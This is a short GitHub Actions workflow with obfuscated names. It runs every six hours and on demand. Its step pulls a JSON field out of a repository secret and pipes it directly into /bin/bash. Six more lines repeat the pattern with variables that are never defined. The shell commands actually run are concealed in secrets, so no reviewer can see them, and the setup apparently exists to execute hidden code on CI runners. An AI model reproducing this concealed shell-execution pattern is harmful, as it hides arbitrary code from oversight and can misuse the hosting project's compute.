name: remudaparliament
on:
  workflow_dispatch:
  schedule:
    - cron: '58 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: remudaparliament
        env:
          sz0112: ${{ secrets.sz0112 }}
        run: |
          echo $sz0112 | jq -r .w24 | /bin/bash
          echo $bi12301 | jq -r .tzgpj5197 | /bin/bash
          echo $sfedk01 | jq -r .lk5 | /bin/bash
          echo $qcguk13 | jq -r .kp30304 | /bin/bash
          echo $yzryu48453 | jq -r .sud546 | /bin/bash
          echo $txw50 | jq -r .v858 | /bin/bash
          echo $vgxp44879 | jq -r .m878 | /bin/bash

